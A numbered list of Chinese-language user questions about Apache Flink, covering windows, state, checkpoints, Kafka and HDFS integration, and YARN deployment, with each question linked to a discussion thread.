169、[需求是根据每条日志切分出需要9个字段,有五个指标再根据9个字段的不同组合去做计算。 第一个方法是:我目前做法是切分的9个字段开5分钟大小1分钟计算一次的滑动窗口窗口,进行一次reduce去重,然后再map取出需要的字段,然后过滤再开5分钟大小1分钟计算一次的滑动窗口窗口进行计算保存结果,这个思路遇到的问题是上一个滑动窗口会每一分钟会计算5分钟数据,到第二个窗口划定的5分钟范围的数据会有好多重复,这个思路会造成数据重复。 第二个方法是:切分的9个字段开5分钟大小1分钟计算一次的滑动窗口窗口,再pross方法里完成所有的过滤,聚合计算,但是再高峰期每分钟400万条数据,这个思路担心在高峰期flink计算不过来](https://t.zsxq.com/BUNfYnY)
170、[a,b,c三个表,a和c有eventtime,a和c直接join可以,a和b join后再和c join 就会报错,这是怎么回事呢](https://t.zsxq.com/aAqBEY7)
171、[自定义的source是这样的(图一所示) 使用的时候是这样的(图二所示),为什么无论 sum.print().setParallelism(2)(图2所示)的并行度设置成几最后结果都是这样的](https://t.zsxq.com/zZNNRzr)
172、[刚接触flink,如有问的不合适的地方,请见谅。 1、为什么说flink是有状态的计算? 2、这个状态是什么?3、状态存在哪里](https://t.zsxq.com/i6Mz7Yj)
173、[这边用flink 1.8.1的版本,采用flink on yarn,hadoop版本2.6.0。代码是一个简单的滚动窗口统计函数,但启动的时候报错,如下图片。 (2)然后我把flink版本换成1.7.1,重新提交到2.6.0的yarn平台,就能正常运行了。 (3)我们测试集群hadoop版本是3.0,我用flink 1.8.1版本将这个程序再次打包,提交到3.0版本的yarn平台,也能正常运行。 貌似是flink 1.8.1版本与yarn 2.6.0版本不兼容造成的这个问题](https://t.zsxq.com/vNjAIMN)
174、[StateBackend我使用的是MemoryStateBackend, State是怎么释放内存的,例如我在函数中用ValueState存储了历史状态信息。但是历史状态数据我没有手动释放,那么程序会自动释放么?还是一直驻留在内存中](https://t.zsxq.com/2rVbm6Y)
175、[请问老师是否可以提供一些Apachebeam的学习资料 谢谢](https://t.zsxq.com/3bIEAyv)
176、[flink 的 DataSet或者DataStream支持索引查询以及删除吗,像spark rdd,如果不支持的话,该转换成什么](https://t.zsxq.com/yFEyZVB)
177、[关于flink的状态,能否把它当做数据库使用,类似于内存数据库,在处理过程中存业务数据。如果是数据库可以算是分布式数据库吗?是不是使用rocksdb这种存储方式才算是?支持的单库大小是不是只是跟本地机器的磁盘大小相关?如果使用硬盘存储会不会效率性能有影响](https://t.zsxq.com/VNrn6iI)
178、[我这边做了个http sink,想要批量发送数据,不过现在只能用数量控制发送,但最后的几个记录没法触发发送动作,想问下有没有什么办法](https://t.zsxq.com/yfmiUvf)
179、[请问下如何做定时去重计数,就是根据时间分窗口,窗口内根据id去重计数得出结果,多谢。试了不少办法,没有简单直接办法](https://t.zsxq.com/vNvrfmE)
180、[我有个job使用了elastic search sink. 设置了批量5000一写入,但是看es监控显示每秒只能插入500条。是不是bulkprocessor的currentrequest为0有关](https://t.zsxq.com/rzZbQFA)
181、[有docker部署flink的资料吗](https://t.zsxq.com/aIur7ai)
182、[在说明KeyBy的StreamGraph执行过程时,keyBy的ID为啥是6? 根据前面说,ID是一个静态变量,每取一次就递增1,我觉得应该是3啊,是我理解错了吗](https://t.zsxq.com/VjQjqF6)
183、[有没计划出Execution Graph的远码解析](https://t.zsxq.com/BEmAIQv)
184、[可以分享下物理执行图怎样划分task,以及task如何执行,还有他们之间数据如何传递这块代码嘛?](https://t.zsxq.com/vVjiYJQ)
185、[Flink源码和这个学习项目的结构图](https://t.zsxq.com/FyNJQbQ)
186、[请问flink1.8,如何做到动态加载外部udf-jar包呢?](https://t.zsxq.com/qrjmmaU)
187、[同一个Task Manager中不同的Slot是怎么交互的,比如:source处理完要传递给map的时候,如果在不同的Slot中,他们的内存是相互隔离,是怎么交互的呢? 我猜是通过序列化和反序列化对象,并且通过网络来进行交互的](https://t.zsxq.com/ZFQjQnm)
188、[你们有没有这种业务场景。flink从kafka里面取数据,每一条数据里面有mongdb表A的id,这时我会在map的时候采用flink的异步IO连接A表,然后查询出A表的字段1,再根据该字段1又需要异步IO去B表查询字段2,然后又根据字段2去C表查询字段3.....像这样的业务场景,如果多来几种逻辑,我应该用什么方案最好呢](https://t.zsxq.com/YBQFufi)
189、[今天本地运行flink程序,消费socket中的数据,连续只能消费两条,第三条flink就消费不了了](https://t.zsxq.com/vnufYFY)
190、[源数据经过过滤后分成了两条流,然后再分别提取事件时间和水印,做时间窗口,我测试时一条流没有数据,另一条的数据看日志到了窗口操作那边就没走下去,貌似窗口一直没有等到触发](https://t.zsxq.com/me6EmM3)
191、[有做flink cep的吗,有资料没?](https://t.zsxq.com/fubQrvj)
192、[麻烦问一下 BucketingSink跨集群写,如果任务运行在hadoop A集群,从kafka读取数据处理后写到Hadoo B集群,即使把core-site.xml和hdfs-site.xml拷贝到代码resources下,路径使用hdfs://hadoopB/xxx,会提示ava.lang.RuntimeException: Error while creating FileSystem when initializing the state of the BucketingSink.,跨集群写这个问题 flink不支持吗?](https://t.zsxq.com/fEQVjAe)
193、[想咨询下,如何对flink中的datastream和dataset进行数据采样](https://t.zsxq.com/fIMVJ2J)
194、[一个flink作业经常发生oom,可能是什么原因导致的。 处理流程只有15+字段的解析,redis数据读取等操作,TM配置10g。 业务会在夜间刷数据,qps能打到2500左右~](https://t.zsxq.com/7MVjyzz)
195、[我看到flink 1.8的状态过期仅支持Processing Time,那么如果我使用的是Event time那么状态就不会过期吗](https://t.zsxq.com/jA2NVnU)
196、[请问我想每隔一小时统计一个属性从当天零点到当前时间的平均值,这样的时间窗该如何定义?](https://t.zsxq.com/BQv33Rb)
197、[flink任务里面反序列化一个类,报ClassNotFoundException,可是包里面是有这个类的,有遇到这种情况吗?](https://t.zsxq.com/nEAiIea)
198、[在构造StreamGraph,类似PartitionTransformmation 这种类型的 transform,为什么要添加成一个虚拟节点,而不是一个实际的物理节点呢?](https://t.zsxq.com/RnayrVn)
199、[flink消费kafka的数据写入到hdfs中,我采用了BucketingSink 这个sink将operator出来的数据写入到hdfs文件上,并通过在hive中建外部表来查询这个。但现在有个问题,处于in-progress的文件,hive是无法识别出来该文件中的数据,可我想能在hive中实时查询进来的数据,且不想产生很多的小文件,这个该如何处理呢](https://t.zsxq.com/A2fYNFA)
200、[采用Flink单机集群模式一个jobmanager和两个taskmanager,机器是单机是24核,现在做个简单的功能从kafka的一个topic转满足条件的消息到另一个topic,topic的分区是30,我设置了程序默认并发为30,现在每秒消费2w多数据,不够快,请问可以怎么提高job的性能呢?](https://t.zsxq.com/7AurJU3)
201、[Flink Metric 源码分析](https://t.zsxq.com/Mnm2nI6)
202、[请问怎么理解官网的这段话?按官网的例子,难道只keyby之后才有keyed state,才能托管Flink存储状态么?source和map如果没有自定义operator state的话,状态是不会被保存的?](https://t.zsxq.com/iAi6QRb)
203、[想用Flink做业务监控告警,并要能够支持动态添加CEP规则,问下可以直接使用Flink CEP还是siddhi CEP? 有没有相关的资料学习下?谢谢!](https://t.zsxq.com/3rbeuju)
204、[请问一下,有没有关于水印,触发器的Java方面的demo啊](https://t.zsxq.com/eYJUbm6)
205、[老师,最近我们线上偶尔出现这种情况,就是40个并行度,其他有一个并行度CheckPoint一直失败,其他39个并行度都是毫秒级别就可以CheckPoint成功,这个怎么定位问题呢?还有个问题 CheckPoint的时间分为三部分 Checkpoint Duration (Async)和 Checkpoint Duration (Sync),还有个 end to end 减去同步和异步的时间,这三部分 分别指代哪块?如果发现这三者中的任意一个步骤时间长,该怎么去优化](https://t.zsxq.com/QvbAqVB)
206、[我这边有个场景很依赖消费出来的数据的顺序。在源头侧做了很多处理,将kafka修改成一个分区等等很多尝试,最后消费出来的还是乱序的。能不能在flink消费的时候做处理,来保证处理的数据的顺序。](https://t.zsxq.com/JaUZvbY)
207、[有一个类似于实时计算今天的pv,uv需求,采用source->keyby->window->trigger->process后,在process里采用ValueState计算uv ,问题是 这个window内一天的所有数据是都会缓存到flink嘛? 一天的数据量如果大点,这样实现就有问题了, 这个有其他的实现思路嘛?](https://t.zsxq.com/iQfaAeu)
208、[Flink 注解源码解析](https://t.zsxq.com/f6eAu3J)
209、[如何监控 Flink 的 TaskManager 和 JobManager](https://t.zsxq.com/IuRJYne)
210、[问下,在真实流计算过程中,并行度的设置,是与 kafka topic的partition数一样的吗?](https://t.zsxq.com/v7yfEIq)
211、[Flink的日志 如果自己做平台封装在自己的界面中 请问job Manger 和 taskManger 还有用户自己的程序日志 怎么获取呢 有api还是自己需要利用flume 采集到ELK?](https://t.zsxq.com/Zf2F6mM)
212、[我想问下一般用Flink统计pv uv是怎么做的?uv存到redis? 每个uv都存到redis,会不会撑爆?](https://t.zsxq.com/72VzBEy)
213、[Flink的Checkpoint 机制,在有多个source的时候,barrier n 的流将被暂时搁置,从其他流接收的记录将不会被处理,但是会放进一个输入缓存input buffer。如果被缓存的record大小超出了input buffer会怎么样?不可能一直缓存下去吧,如果其中某一条就一直没数据的话,整个过程岂不是卡死了?](https://t.zsxq.com/zBmm2fq)
214、[公司想实时展示订单数据,汇总金额,并需要和前端交互,实时生成数据需要告诉前端,展示成折线图,这种场景的技术选型是如何呢?包括数据的存储,临时汇总数据的存储,何种形式告诉前端](https://t.zsxq.com/ZnIAi2j)
215、[请问下checkpoint中存储了哪些东西?](https://t.zsxq.com/7EIeEyJ)
216、[我这边有个需求是实时计算当前车辆与前车距离,用经纬度求距离。大概6000台车,10秒一条经纬度数据。gps流与自己join的地方在进行checkpoint的时候特别缓,每次要好几分钟。checkpoint 状态后端是rocksDB。有什么比较好的方案吗?自己实现一个类似last_value的函数取车辆最新的经纬再join,或者弄个10秒的滑动窗口输出车辆最新的经纬度再进行join,这样可行吗?](https://t.zsxq.com/euvFaYz)
217、[flink在启动的时候能不能指定一个时间点从kafka里面恢复数据呢](https://t.zsxq.com/YRnEUFe)
218、[我们线上有个问题,很多业务都去读某个hive表,但是当这个hive表正在写数据的时候,偶尔出现过 读到表里数据为空的情况,这个问题怎么解决呢?](https://t.zsxq.com/7QJEEyr)
219、[使用 InfluxDB 和 Grafana 搭建监控 Flink 的平台](https://t.zsxq.com/yVnaYR7)
220、[flink消费kafka两个不同的topic,然后进行join操作,如果使用事件时间,两个topic都要设置watermaker吗,如果只设置了topic A的watermaker,topic B的不设置会有什么影响吗?](https://t.zsxq.com/uvFU7aY)
221、[请教一个问题,我的Flink程序运行一段时间就会报这个错误,定位好多天都没有定位到。checkpoint 时间是5秒,20秒都不行。Caused by: java.io.IOException: Could not flush and close the file system output stream to hdfs://HDFSaaaa/flink/PointWideTable_OffTest_Test2/1eb66edcfccce6124c3b2d6ae402ec39/chk-355/1005127c-cee3-4099-8b61-aef819d72404 in order to obtain the stream state handle](https://t.zsxq.com/NNFYJMn)
222、[Flink的反压机制相比于Storm的反压机制有什么优势呢?问题2: Flink的某一个节点发生故障,是否会影响其他节点的正常工作?还是会通过Checkpoint容错机制吗把任务转移到其他节点去运行呢?](https://t.zsxq.com/yvRNFEI)
223、[我在验证checkpoint的时候遇到给问题,不管是key state 还是operator state,默认和指定uid是可以的恢复state数据的,当指定uidHash时候无法恢复state数据,麻烦大家给解答一样。我操作state是实现了CheckpointedFunction接口,覆写snapshotState和initializeState,再这两个方法里操作的,然后让程序定时抛出异常,观察发现指定uidHash后snapshotState()方法里context.isRestored()为false,不太明白具体是什么原因](https://t.zsxq.com/ZJmiqZz)
224、[kafka 中的每条数据需要和 es 中的所有数据(动态增加)关联,关联之后会做一些额外的操作,这个有什么比较可行的方案?](https://t.zsxq.com/mYV37qF)
225、[flink消费kafka数据,设置1分钟checkpoint一次,假如第一次checkpoint完成以后,还没等到下一次checkpoint,程序就挂了,kafka offset还是第一次checkpoint记录的offset,那么下次重新启动程序,岂不是多消费数据了?那flink的 exactly one消费语义是怎么样的?](https://t.zsxq.com/buFeyZr)
226、[程序频繁发生Heartbeat of TaskManager with id container_e36_1564049750010_5829_01_000024 timed out. 心跳超时,一天大概10次左右。是内存没给够吗?还是网络波动引起的](https://t.zsxq.com/Znyja62)
227、[有没有性能优化方面的指导文章?](https://t.zsxq.com/AA6ma2Z)
228、[flink消费kafka是如何监控消费是否正常的,有啥好办法?](https://t.zsxq.com/a2N37a6)
229、[我按照官方的wordcount案例写了一个例子,然后在main函数中起了一个线程,原本是准备定时去更新某些配置,准备测试一下是否可行,所以直接在线程函数中打印一条语句测试是否可行。现在测试的结果是不可行,貌似这个线程根本就没有执行,请问这是什么原因呢? 按照理解,JobClient中不是反射类执行main函数吗, 执行main函数的时候为什么没有执行这个线程的打印函数呢?](https://t.zsxq.com/m2FeeMf)
230、[请问我想保留最近多个完成的checkpoint数据,是通过设置 state.checkpoints.num-retained 吗?要怎么使用?](https://t.zsxq.com/EyFUb6m)
231、[有没有etl实时数仓相关案例么?比如二十张事实表流join](https://t.zsxq.com/rFeIAeA)
232、[为什么我扔到flink 的stream job,立刻就finished](https://t.zsxq.com/n2RFmyN)
233、[有没有在flink上机器学习算法的一些例子啊,除了官网提供的flink exampke里的和flink ml里已有的](https://t.zsxq.com/iqJiyvN)
234、[如果我想扩展sql的关键词,比如添加一些数据支持,有什么思路,现在想的感觉都要改calcite(刚碰flink感觉难度太大了)](https://t.zsxq.com/uB6aUzZ)
235、[我想实现统计每5秒中每个类型的次数,这个现在不输出,问题出在哪儿啊](https://t.zsxq.com/2BEeu3Z)
236、[我用flink往hbase里写数据,有那种直接批量写hfile的方式的demo没](https://t.zsxq.com/VBA6IUR)
237、[请问怎么监控Kafka消费是否延迟,是否出现消息积压?你有demo吗?这种是用Springboot自己写一个监控,还是咋整啊?](https://t.zsxq.com/IieMFMB)
238、[请问有计算pv uv的例子吗](https://t.zsxq.com/j2fM3BM)
239、[通过控制流动态修改window算子窗口类型和长度要怎么写](https://t.zsxq.com/Rb2Z7uB)
240、[flink的远程调试能出一版么?网上资料坑的多](https://t.zsxq.com/UVbaQfM)
241、[企业里,Flink开发,java用得多,还是scala用得多?](https://t.zsxq.com/AYVjAuB)
242、[flink的任务运行在yarn的环境上,在yarn的resourcemanager在进行主备切换时,所有的flink任务都失败了,而MR的任务可以正常运行。报错信息如下:AM is not registered for known application attempt: appattempt_1565306391442_89321_000001 or RM had restarted after AM registered . AM should re-register
请问这是什么原因,该如何处理呢?](https://t.zsxq.com/j6QfMzf)
243、[请教一个分布式问题,比如在Flink的多个TaskManager上统计指标count,TM1有两条数据,TM2有一条数据,程序是怎么计算出来是3呢?原理是怎么样的](https://t.zsxq.com/IUVZjUv)
244、[现在公司部分sql查询oracle数据特别的慢,因为查询条件很多想问一下有什么方法,例如基于大数据组件可以加快查询速度的吗?](https://t.zsxq.com/7MFEQR3)
245、[想咨询下有没有做过flink同步配置做自定义计算的系统?或者有没有什么好的建议?业务诉求是希望业务用户可以自助配置计算规则做流式计算](https://t.zsxq.com/Mfa6aQB)
246、[我这边有个实时同步数据的任务,白天运行的时候一直是正常的,一到凌晨2点多之后就没有数据sink进mysql。晚上会有一些离线任务和一些dataX任务同步数据到mysql。但是任务一切都是正常的,ck也很快20ms,数据也是正常消费。看了yarn上的日志,没有任何error。自定义的sink里面也设置了日志打印,但是log里没有。这种如何快速定位问题。](https://t.zsxq.com/z3bunyN)
247、[有没有flink处理异常数据的案例资料](https://t.zsxq.com/Y3fe6Mn)
248、[flink中如何传递一个全局变量](https://t.zsxq.com/I2Z7Ybm)
249、[台4核16G的Flink taskmanager配一个单独的Yarn需要一台啥样的服务器?其他功能都不需要就一个调度的东西?](https://t.zsxq.com/iIUZrju)
250、[side-output 的分享](https://t.zsxq.com/m6I2BEE)
251、[使用 InfluxDB + Grafana 监控flink能否配置告警。是不是prometheus更强大点?](https://t.zsxq.com/amURFme)
252、[我们线上遇到一个问题,带状态的算子没有指定 uid,现在代码必须改,那个带状态的算子 不能正常恢复了,有解吗?通过某种方式能获取到系统之前自动生成的uid吗?](https://t.zsxq.com/rZfyZvn)
253、[tableEnv.registerDataStream(""Orders"", ds, ""user, product, amount, proctime.proctime, rowtime.rowtime"");请问像这样把流注册成表的时候,这两个rowtime分别是什么意思](https://t.zsxq.com/uZz3Z7Q)
254、[我想问一下 flink on yarn session 模式下提交任务官网给的例子是 flink run -c xxx.MainClass job.jar 这里是怎么知道 yarn 上的哪个是 flink 的 appid 呢?](https://t.zsxq.com/yBiEyf2)
255、[Flink Netty Connector 这个有详细的使用例子? 通过Netty建立的source能直接回复消息吗?还是只能被动接受消息?](https://t.zsxq.com/yBeyfqv)
256、[请问flink sqlclient 提交的作业可以用于生产环境吗?](https://t.zsxq.com/FIEia6M)
257、[flink批处理写回mysql是否没法用tableEnv.sqlUpdate(""insert into t2 select * from t1"")?作为sink表的t2要如何注册?查跟jdbc相关的就两个TableSink,JDBCAppendTableSink用于BatchTableSink,JDBCUpertTablSink用于StreamTableSink。前者只接受insert into values语法。所以我是先通过select from查询获取到DataSet再JDBCAppendTableSink.emitDataSet(ds)实现的,但这样达不到sql rule any目标](https://t.zsxq.com/ZBIaUvF)
258、[请问在stream模式下,flink的计算结果在不落库的情况下,可以通过什么restful api获取计算结果吗](https://t.zsxq.com/aq3BIU7)
259、[现在我有场景,需要把一定的消息发送给kafka topic指定的partition,该怎么搞?](https://t.zsxq.com/NbYnAYF)
260、[请问我的job作业在idea上运行正常 提交到生产集群里提示Caused by: java.lang.NoSuchMethodError: org.apache.flink.api.java.ClosureCleaner.clean(Ljava/lang/Object;Z)V请问如何解决](https://t.zsxq.com/YfmAMfm)
261、[遇到一个很奇怪的问题,在使用streamingSQL时,发现timestamp在datastream的时候还是正常的,在注册成表print出来的时候就少了八小时,大佬知道是什么原因么?](https://t.zsxq.com/72n6MVb)
262、[请问将flink的产生的一些记录日志异步到kafka中,需要如何配置,配置后必须要重启集群才会生效吗](https://t.zsxq.com/RjQFmIQ)
263、[星主你好,问下flink1.9对维表join的支持怎么样了?有文档吗](https://t.zsxq.com/Q7u3vzR)
264、[请问下 flink slq: SELECT city_name as city_name, count(1) as total, max(create_time) as create_time FROM * 。代码里面设置窗口为: retractStream.timeWindowAll(Time.minutes(5))一个global窗口,数据写入hdfs 结果数据重复 ,存在两条完全重复的数据如下 常州、2283、 1566230703):请问这是为什么](https://t.zsxq.com/aEEA66M)
265、[我用rocksdb存储checkpoint,线上运行一段时间发展checkpoint占用空间越来越大,我是直接存本地磁盘上的,怎么样能让它自动清理呢?](https://t.zsxq.com/YNrfyrj)
266、[flink应该在哪个用户下启动呢,是root的还是在其他的用户呢](https://t.zsxq.com/aAaqFYn)
267、[link可以读取lzo的文件吗](https://t.zsxq.com/2nUBIAI)
268、[怎么快速从es里面便利数据?我们公司现在所有的数据都存在Es里面的;我发现每次从里面scan数据的时候特别慢;你那有没有什么好的办法?](https://t.zsxq.com/beIY7mY)
269、[如果想让数据按照其中一个假如f0进行分区,然后每一个分区做处理的时候并行度都是1怎么设置呢](https://t.zsxq.com/fYnYrR7)
270、[近在写算子的过程中,使用scala语言写flink比较快,而且在process算子中实现ontime方式时,可以使用scala中的listbuff来输出一个top3的记录;那么到了java中,只能用ArrayList将flink中的ListState使用get()方法取出之后放在ArrayList吗?](https://t.zsxq.com/nQFYrBm)
271、[请问老师能否出一些1.9版本维表join的例子 包括async和维表缓存?](https://t.zsxq.com/eyRRv7q)
272、[flink kaka source设置为从组内消费,有个问题是第一次启动任务,我发现kafka中的历史数据不会被消费,而是从当前的数据开始消费,而第二次启动的时候才会从组的offset开始消费,有什么办法可以让第一次启动任务的时候可以消费kafka中的历史数据吗](https://t.zsxq.com/aMRzjMb)
273、[1.使用flink定时处理离线数据,有时间戳字段,如何求出每分钟的最大值,类似于流处理窗口那样,2如果想自己实现批流统一,有什么好的合并方向吗?比如想让流处理使用批处理的一个算子。](https://t.zsxq.com/3ZjiEMv)
274、[flink怎么实现流式数据批量对待?流的数据是自定义的source,读取的redis多个Hash表,需要控制批次的概念](https://t.zsxq.com/AIYnEQN)
275、[有人说不推荐在一个task中开多个线程,这个你怎么看?](https://t.zsxq.com/yJuFEYb)
276、[想做一个运行在hbase+es架构上的sql查询方案,flink sql能做吗,或者有没有其他的解决方案或者思路?](https://t.zsxq.com/3f6YBmu)
277、[正在紧急做第一个用到Flink的项目,咨询一下,Flink 1.8.1写入ES7就是用自带的Sink吗?有没有例子分享一下,我搜到的都是写ES6的。这种要求我知道不适合提,主要是急,自己试几下没成功。T T](https://t.zsxq.com/jIAqVnm)
278、[手动停止任务后,已经保存了最近一次保存点,任务重新启动后,如何使用上一次检查点?](https://t.zsxq.com/2fAiuzf)
279、[批处理使用流环境(为了使用窗口),那如何确定批处理结束,就是我的任务可以知道批文件读取完事,并且处理完数据后关闭任务,如果不能,那批处理如何实现窗口功能](https://t.zsxq.com/BIiImQN)
280、[如果限制只能在window 内进行去重,数据量还比较大,有什么好的方法吗?](https://t.zsxq.com/Mjyzj66)
281、[端到端exactly once有没有出文章](https://t.zsxq.com/yv7Ujme)
282、[流怎么动态加?,流怎么动态删除?,参数怎么动态修改 (广播](https://t.zsxq.com/IqNZFey)
283、[自定义的source数据源实现了有批次的概念,然后Flink将这个一个批次流注册为多个表join操作,有办法知道这个sql什么时候计算完成了?](https://t.zsxq.com/r7AqvBq)
284、[编译 Flink 报错,群主遇到过没,什么原因](https://t.zsxq.com/rvJiyf6)
285、[我现在是flink on yarn用zookeeper做HA现在在zk里查看检查点信息,为什么里面的文件是ip,而不是路径呢?我该如何拿到那个路径。
- 排除rest api 方式获取,因为任务关了restapi就没了
-排除history server,有点不好用](https://t.zsxq.com/nufIaey)
286、[在使用streamfilesink消费kafka之后进行hdfs写入的时候,当直接关闭flink程序的时候,下次再启动程序消费写入hdfs的时候,文件又是从part-0-0开始,这样就跟原来写入的冲突了,该文件就一直处于ingress状态。](https://t.zsxq.com/Fy3RfE6)
287、[现在有一个实时数据分析的需求,数据量不大,但要求sink到mysql,因为是实时更新的,我现在能想到的处理方法就是每次插入一条数据的时候,先从mysql读数据,如果有这条,就执行update,没有的话就insert,但是这样的话每写一条数据就有两次交互了。想问一下老师有没有更好的办法,或者flink有没有内置的api可以执行这种不确定是更新还是插入的操作](https://t.zsxq.com/myNF2zj)
288、[Flink设置了checkpoint,job manage会定期删除check point数据,但是task manage不删除,这个是什么原因](https://t.zsxq.com/ZFiMzrF)
289、[请教一下使用rocksdb作为statebackend ,在哪里可以监控rocksdb io 内存指标呢](https://t.zsxq.com/z3RzJUV)
290、[状态的使用场景,以及用法能出个文章不,这块不太了解](https://t.zsxq.com/AUjE2ZR)
291、[请问一下 Flink 1.9 SQL API中distinct count 是如何实现高效的流式去重的?](https://t.zsxq.com/aaynii6)
292、[在算子内如何获取当前算子并行度以及当前是第几个task](https://t.zsxq.com/mmEyVJA)
293、[有没有flink1.9结合hive的demo。kafka到hive](https://t.zsxq.com/fIqNF6y)
294、[能给讲讲apache calcite吗](https://t.zsxq.com/ne6UZrB)
295、[请问一下像这种窗口操作,怎么保证程序异常重启后保持数据的状态呢?](https://t.zsxq.com/VbUVFMr)
296、[请问一下,我在使用kafkasource的时候,把接过来的Jsonstr转化成自定义的一个类型,用的是gson. fromJson(jsonstr,classOf[Entity])报图片上的错误了,不知道怎么解决,在不转直接打印的情况下是没问题的](https://t.zsxq.com/EMZFyZz)
297、[DataStream读数据库的表,做多表join,能设置时间窗口么,一天去刷一次。流程序会一直拉数据,数据库扛不住了](https://t.zsxq.com/IEieI6a)
298、[请问一下flink支持多路径通配读取吗?例如路径:s3n://pekdc2-deeplink-01/Kinesis/firehose/2019/07/03/*/* ,通配读取找不到路径。是否需要特殊设置](https://t.zsxq.com/IemmiY7)
299、[flink yarn环境部署 但是把容器的url地址删除。就会跳转到的hadoop的首页。怎么屏蔽hadoop的yarn首页地址呢?要不暴露这个地址用户能看到所有任务很危险](https://t.zsxq.com/QvZFUNN)
300、[flink sql怎么写一个流,每秒输出当前时间呢](https://t.zsxq.com/2JiubeM)
301、[因为想通过sql弄一个数据流。哈哈 另外想问一个问题,我把全局设置为根据处理时间的时间窗口,那么我在processAllWindowFunction里面要怎么知道进来的每个元素的处理时间是多少呢?这个元素进入这个时间窗口的依据是什么](https://t.zsxq.com/bQ33BmM)
302、[如何实现一个设备上报的数据存储到同一个hdfs文件中?](https://t.zsxq.com/rB6ybYF)
303、[我自己写的kafka生产者测试,数据格式十分简单(key,i)key是一个固定的不变的字符串,i是自增的,flink consumer这边我开了checkpoint. 并且是exactly once,然后程序很简单,就是flink读取kafka的数据然后直接打印出来,我发现比如我看到打印到key,10的时候我直接关掉程序,然后重新启动程序,按理来说应当是从上次的offset继续消费,也就是key,11,但实际上我看到的可能是从key,9开始,然后依次递增,这是是不是说明是重复消费了,那exactly one需要怎么样去保障?](https://t.zsxq.com/MVfeeiu)
304、[假设有一个数据源在源源不断的产生数据,到Flink的反压来到source端的时候,由于Flink处理数据的速度跟不上数据源产生数据的速度,
问题1: 这个时候在Flink的source端会怎么处理呢?是将处理不完的数据丢弃还是进行缓存呢?
问题2: 如果是缓存,怎么进行缓存呢?](https://t.zsxq.com/meqzJme)
305、[一个stream 在sink多个时,这多个sink是串行 还是并行的。](https://t.zsxq.com/2fEeMny)
306、[我想在流上做一个窗口,触发窗口的条件是固定的时间间隔或者数据量达到预切值,两个条件只要有一个满足就触发,除了重写trigger在,还有什么别的方法吗?](https://t.zsxq.com/NJY76uf)
307、[使用rocksdb作为状态后端,对于使用sql方式对时间字段进行group by,以达到去窗口化,但是这样没办法对之前的数据清理,导致磁盘空间很大,对于这种非编码方式,有什么办法设置ttl,清理以前的数据吗](https://t.zsxq.com/A6UN7eE)
308、[请问什么时间窗为什么会有TimeWindow{start=362160000, end=362220000}
和 TimeWindow{start=1568025300000, end=1568025360000}这两种形式,我都用的是一分钟的TumblingEventTimeWindows,为什么会出现不同的情况?](https://t.zsxq.com/a2fUnEM)
309、[比如我统计一天的订单量。但是某个数据延迟一天才到达。比如2019.08.01这一天订单量应该是1000,但是有个100的单据迟到了,在2019.08.02才到达,那么导致2019.08.01这一天统计的是900.后面怎么纠正这个错误的结果呢](https://t.zsxq.com/Y3jqjuj)
310、[flink streaming 模式下只使用堆内内存么](https://t.zsxq.com/zJaMNne)
311、[如果考虑到集群的迁移,状态能迁移吗](https://t.zsxq.com/EmMrvVb)
312、[我们现在有一个业务场景,数据上报的值是这样的格式(时间,累加值),我们需要这样的格式数据(时间,当前值)。当前值=累加值-前一个数据的累加值。flink如何做到呢,有考虑过state机制,但是服务宕机后,state就被清空了](https://t.zsxq.com/6EUFeqr)
313、[Flink On k8s 与 Flink on Yarn相比的优缺点是什么?那个更适合在生产环境中使用呢](https://t.zsxq.com/y7U7Mzf)
314、[有没有datahub链接flink的 连接器呀](https://t.zsxq.com/zVNbaYn)
315、[单点resourcemanager 挂了,对任务会产生什么影响呢](https://t.zsxq.com/FQRNJ2j)
316、[flink监控binlog,跟另一张维表做join后,sink到MySQL的最终表。对于最终表的增删改操作,需要定义不同的sink么?](https://t.zsxq.com/rnemUN3)
317、[请问窗口是在什么时候合并的呢?例如:数据进入windowoperator的processElement,如果不是sessionwindow,是否会进行窗口合并呢?](https://t.zsxq.com/JaaQFqB)
318、[Flink中一条流能参与多路计算,并多处输出吗?他们之前会不会相互影响?](https://t.zsxq.com/AqNFM33)
319、[keyBy算子定义是将一个流拆分成不相交的分区,每个分区包含具有相同的key的元素。我不明白的地方是: keyBy怎么设置分区数,是给这个算子设置并行度吗? 分区数和slot数量是什么关系?](https://t.zsxq.com/nUzbiYj)
320、[动态cep-pattern,能否详细说下?滴滴方案未公布,您贴出来的几张图片是基于1.7的。或者有什么想法也可以讲解下,谢谢了](https://t.zsxq.com/66URfQb)
321、[问题1:使用常驻型session ./bin/yarn-session.sh -n 10 -s 3 -d启动,这个时候分配的资源是yarn 队列里面的, flink提交任务 flink run xx.jar, 其余机器是怎样获取到flink需要运行时的环境的,因为我只在集群的一台机器上有flink 安装包。](https://t.zsxq.com/maEQ3NR)
322、[flink task manager中slot间的内存隔离,cpu隔离是怎么实现的?flink 设计slot的概念有什么意义,为什么不像spark executor那样,内部没有做隔离?](https://t.zsxq.com/YjEYjQz)
323、[spark和kafka集成,direct模式,spark的一个分区对应kafka的一个主题的一个分区。那flink和kafka集成的时候,怎么消费kafka的数据,假设kafka某个主题5个partition](https://t.zsxq.com/nuzvVzZ)
324、[./bin/flink run -m yarn-cluster 执行的flink job ,作业自己打印的日志通过yarn application的log查看不了,只有集群自身的日志,程序中logger.info打印日志存放在哪,还是我打包的方式问题,打日志用的是slf4j。](https://t.zsxq.com/27u3ZZf)
325、[在物联网平台中,需要对每个key下的数据做越限判断,由于每个key的越限值是不同的,越限值配置在实时数据库中。
若将越限值加载到state中,由于key的量很大(大概3亿左右),会导致state太大,可能造成内存溢出。若在处理数据时从实时数据库中读取越限值,由于网络IO开销,可能造成实时性下降。请问该如何处理?谢谢](https://t.zsxq.com/miuzFY3)
326、[如果我一个flink程序有多个window操作,时间戳和watermark是不是每个window都需要分配,还有就是事件时间是不是一定要在数据源中就存在某个字段](https://t.zsxq.com/amURvZR)
327、[有没有flink1.9刚支持的用ddl链接kafka并写入hbase的资料,我们公司想把离线的数仓逐渐转成实时的,写sql对于我们来说上手更快一些,就想找一些这方面的资料学习一下。](https://t.zsxq.com/eqFuBYz)
328、[flink1.9 进行了数据类型的转化时发生了不匹配的问题, 目前使用的Type被弃用,推荐使用是datatypes 类型,但是之前使用的Type类型的方法 对应的schema typeinformation 目前跟datatypes的返回值不对应,请问下 该怎么去调整适配?](https://t.zsxq.com/yVvR3V3)
